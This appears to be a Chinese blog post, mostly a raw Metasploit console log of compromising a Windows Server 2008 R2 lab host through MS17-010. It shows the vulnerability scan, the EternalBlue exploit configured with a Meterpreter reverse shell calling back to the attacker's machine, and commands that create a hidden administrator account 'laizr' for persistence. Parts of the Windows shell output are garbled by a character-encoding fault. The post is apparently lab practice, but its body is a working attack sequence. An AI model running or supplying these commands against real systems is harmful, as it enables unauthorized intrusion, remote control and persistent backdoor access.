渗透2008R2 ms-17010
┌──(root💀laizr)-[~]
└─# msfconsole 127 ⨯
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.0.15-dev ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use the edit command to open the currently active module in your editor
msf6 > set RHOSTS 172.16.16.129
RHOSTS => 172.16.16.129
msf6 > run
[-] Unknown command: run.
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 172.16.16.129
RHOSTS => 172.16.16.129
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 172.16.16.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.16.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.16.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.16.46 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 172.16.16.129
rhost => 172.16.16.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.16.46
lhost => 172.16.16.46
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 172.16.16.46:4444
[*] 172.16.16.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.16.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.16.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.16.129:445 - Connecting to target for exploitation.
[+] 172.16.16.129:445 - Connection established for exploitation.
[+] 172.16.16.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.16.129:445 - CORE raw buffer dump (46 bytes)
[*] 172.16.16.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv
[*] 172.16.16.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601
[*] 172.16.16.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1
[+] 172.16.16.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.16.129:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.16.129:445 - Sending all but last fragment of exploit packet
[*] 172.16.16.129:445 - Starting non-paged pool grooming
[+] 172.16.16.129:445 - Sending SMBv2 buffers
[+] 172.16.16.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.16.129:445 - Sending final SMBv2 buffers.
[*] 172.16.16.129:445 - Sending last fragment of exploit packet!
[*] 172.16.16.129:445 - Receiving response from exploit packet
[+] 172.16.16.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.16.129:445 - Sending egg to corrupted connection.
[*] 172.16.16.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.16.16.129
[*] Meterpreter session 1 opened (172.16.16.46:4444 -> 172.16.16.129:49251) at 2021-01-18 19:12:27 +0800
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shell
Process 2808 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>sysinfo
sysinfo
'sysinfo' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
C:\Windows\system32>screenshot
screenshot
'screenshot' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
C:\Windows\system32>net user
net user
\\ ���û��ʻ�
-------------------------------------------------------------------------------
Administrator Guest
�����������ϣ�������һ��������������
C:\Windows\system32>net user laizr 123.com /add
net user laizr 123.com /add
�����ɹ����ɡ�
C:\Windows\system32>net
C:\Windows\system32>sysinfo
sysinfo
'sysinfo' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
C:\Windows\system32>net localgroup administrators laizr /add
net localgroup administrators laizr /add
�����ɹ����ɡ�
C:\Windows\system32>cd ..
cd ..
C:\Windows>cd...
cd...
C:\Windows>cd..
cd..
C:\>mkdir aaa
mkdir aaa
C:\>dir
dir
������ C �еľ�û�б�ǩ��
��������� 709C-5214
---------------------------作者:HelloBytes
关于作者: JavaEE小新人,请多多赐教!
本文版权归作者和博客园共有,欢迎转载,但必须给出原文链接,并保留此段声明,否则保留追究法律责任的权利。